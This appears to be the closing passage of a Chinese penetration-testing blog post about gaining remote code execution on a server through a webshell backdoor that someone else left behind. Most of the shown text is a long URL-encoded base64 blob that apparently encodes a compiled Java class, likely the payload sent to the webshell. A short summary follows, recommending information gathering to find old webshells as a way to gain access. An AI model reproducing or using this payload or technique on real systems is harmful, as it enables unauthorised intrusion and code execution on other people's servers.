FCgpTGphdmEvbGFuZy9PYmplY3Q7ACEAYQA%2BAAAABgABAGIAYwAAAAEAZABlAAAAAQBmAGcAAAABAGgAZwAAAAEAaQBnAAAAAQBqAGcAAAAIAAEAawBsAAEAbQAAAGMAAgABAAAAISq3AAEqAbUAAioBtQADKhIEtQAFKhIGtQAHKhIItQAJsQAAAAIAbgAAAB4ABwAAABEABAAKAAkACwAOAAwAFAANABoADgAgABIAbwAAAAwAAQAAACEAcABxAAAAAQByAHMAAQBtAAABiwAEAAcAAACrKiu2AAq7AAtZtwAMTRINThIOOgQSDzoFKrQAAxIQuQARAgAqtAACKrQAB7kAEgIAKrQAAyq0AAe5ABMCACoqKrQAAhkFuQAUAgC2ABW1ABYsKrYAF7YAGFenACE6Biy7ABpZtwAbEhy2AB0ZBrYAHrYAHbYAH7YAGFcqtAADuQAgAQC7ABpZtwAbLbYAHSostgAhtgAitgAdGQS2AB22AB%2B2ACOnAAU6BgSsAAIAGABZAFwAGQB6AKQApwAZAAMAbgAAAEYAEQAAABUABQAWAA0AFwAQABgAFAAZABgAHAAjAB0AMAAeAD0AHwBQACAAWQAjAFwAIQBeACIAegAmAKQAKACnACcAqQAqAG8AAABIAAcAXgAcAHQAdQAGAAAAqwBwAHEAAAAAAKsAdgB3AAEADQCeAHgAeQACABAAmwB6AGcAAwAUAJcAewBnAAQAGACTAHwAZwAFAH0AAAAkAAT%2FAFwABgcAfgcAfwcAgAcAgQcAgQcAgQABBwCCHWwHAIIBAAAAgwCEAAIAbQAAAQ8AAwAHAAAAZLgAJBIltgAmTCu2ACdNuwAaWbcAG04BOgS7AChZLLcAKToFuwAqWRkFtwArOgYZBrYALFk6BMYAEi0ZBLYAHRIttgAdV6f%2F6bsAGlm3ABsSLrYAHS22AB%2B2AB0SLrYAHbYAH7AAAAADAG4AAAAmAAkAAAAzAAkANAAOADUAFgA2ABkANwAjADgALgA5ADkAOgBIADwAbwAAAEgABwAAAGQAcABxAAAACQBbAIUAhgABAA4AVgCHAIgAAgAWAE4AiQCKAAMAGQBLAIsAZwAEACMAQQCMAI0ABQAuADYAjgCPAAYAfQAAAB8AAv8ALgAHBwB%2BBwCQBwCRBwCSBwCBBwCTBwCUAAAZAJUAAAAEAAEAlgAAAJcAmAABAG0AAAFJAAQACAAAAFm7ABpZtwAbTSsSL7YAMJoAP7gAMU4tOgQtvjYFAzYGFQYVBaIAHBkEFQYyOgcsGQe2ADIDBbYAM1eEBgGn%2F%2BOnABVOLBIvtgAdV6cACiwSL7YAHVcstgAfsAABABEAPwBCABkAAwBuAAAAPgAPAAAAQAAIAEEAEQBDABUARAAYAEUAHABHACYASAAtAEkAOQBHAD8ATQBCAEsAQwBMAEoATQBNAE8AVABSAG8AAABcAAkALQAMAJkAmgAHAB8AIACbAJwABgAVACoAegCdAAMAGAAnAHsAnQAEABwAIwB8AJwABQBDAAcAdAB1AAMAAABZAHAAcQAAAAAAWQB2AGcAAQAIAFEAeACKAAIAfQAAADAABf8AHwAHBwB%2BBwCBBwCSBwCeBwCeAQEAAP8AHwADBwB%2BBwCBBwCSAABCBwCCCgYAAQCfAKAAAQBtAAACBgAEAAYAAADfK7YANLYANZkAJSvAADbAADbAADZNKiwDMsAAN7UAAiosBDLAADi1AAOnALUSObgAOk0qLBI7A70APLYAPSsDvQA%2BtgA%2FwAA3tQACKiwSQAO9ADy2AD0rA70APrYAP8AAOLUAA6cAek0rwQA3mQByKivAADe1AAIqtAACtgA0EkG2AEJOLQS2AEMtKrQAArYARMAANzoEGQS2ADQSRbYAQjoFGQUEtgBDKhkFGQS2AETAADi1AAOnAChOKiq0AAK2ADQSQAO9ADy2AD0rA70APrYAP8AAOLUAA6cABToEsQADACwAZABnABkAdwC2ALkAGQC6ANkA3AAZAAMAbgAAAGIAGAAAAFYACgBXABUAWAAfAFkAKQBaACwAXAAyAF0ASwBeAGQAcQBnAF8AaABgAG8AYQB3AGQAhABlAIkAZgCWAGcAogBoAKgAaQC2AG8AuQBqALoAbADZAG4A3ABtAN4AdABvAAAAXAAJABUAFAB4AKEAAgAyADIAogCjAAIAhAAyAHoApAADAJYAIAB7AGMABACiABQAfACkAAUAugAkAJkAdQADAGgAdgB0AHUAAgAAAN8AcABxAAAAAADfAHYAdwABAH0AAAAzAAUsegcAgv8AUQADBwB%2BBwB%2FBwCCAAEHAIL%2FACIABAcAfgcAfwcAggcAggABBwCC%2BQABAAEApQCYAAEAbQAAAPwABgAFAAAAcioqtAAWtgBGTRJHEkgGvQA8WQMSSVNZBLIASlNZBbIASlO2AD1OLQS2AEstKrYANLYATAa9AD5ZAyxTWQQDuABNU1kFLL64AE1TtgA%2FwAA8OgQZBAS9ADxZAxJOU7YATwS9AD5ZAytTtgBQtgBRsE0rsAABAAAAbgBvABkAAwBuAAAAHgAHAAAAeAAJAHkAJgB6ACsAewBSAHwAbwB9AHAAfgBvAAAAPgAGAAkAZgB4AKYAAgAmAEkAegCnAAMAUgAdAHsAowAEAHAAAgB8AHUAAgAAAHIAcABxAAAAAAByAHYAZwABAH0AAAAIAAH3AG8HAIIAAACoAJgAAgBtAAAAyAAEAAQAAAA3Az0qtAAJuABSPisdtgBTTKcABk4DPSq0AAUSBLYAVJkAFrsATlkqK7YARiq0AAe3AFWnAAQrsAABAAIAEAATABkAAwBuAAAAHgAHAAAAgwACAIYACgCHABAAigATAIgAFACJABYAjABvAAAANAAFAAoABgB8AJwAAwAUAAIAewB1AAMAAAA3AHAAcQAAAAAANwB2AGcAAQACADUAeACpAAIAfQAAABkABP8AEwADBwB%2BBwCBAQABBwCCAh5ABwCBAJUAAAAEAAEAGQABAKoAqwABAG0AAAF%2BAAYABwAAAJYBTRJWuABXTi0SWLYAWZsATRJauAA6OgQZBBJbA70APLYAXAEDvQA%2BtgA%2FOgYZBrYANBJdBL0APFkDEk5TtgBcGQYEvQA%2BWQMrU7YAP8AAScAAScAASToFpwA1El64ADo6BBkEEl8EvQA8WQMSTlO2AFwZBLYAYAS9AD5ZAytTtgA%2FwABJwABJwABJOgUZBbA6BAO8CLAAAQAIAI8AkAAZAAMAbgAAADIADAAAAJAAAgCRAAgAlgARAJcAGACYAC0AmQBYAJoAWwCbAGIAnACNAJ8AkACgAJIAoQBvAAAAZgAKAC0AKwB8AHcABgAYAEMAewCjAAQAWAADAJkApgAFAGIALgB7AKMABACNAAMAmQCmAAUAkgAEAJsAdQAEAAAAlgBwAHEAAAAAAJYAdgBnAAEAAgCUAHgAdwACAAgAjgB6AGcAAwB9AAAAKgAD%2FQBbBwB%2FBwCB%2FQAxBwCsBwBJ%2FwACAAQHAH4HAIEHAH8HAIEAAQcAggABAK0AAAACAK4%3D

最后就告诉弟弟，成功rce了。

总结

权限获取不一定非要通过端口弱口令、RCE、文件上传、注入、钓鱼等漏洞去获取。也可以通过信息搜集找到历史的webshell后门去获取权限。

不过此方法获取权限成本较高，不推荐，只能作为思路。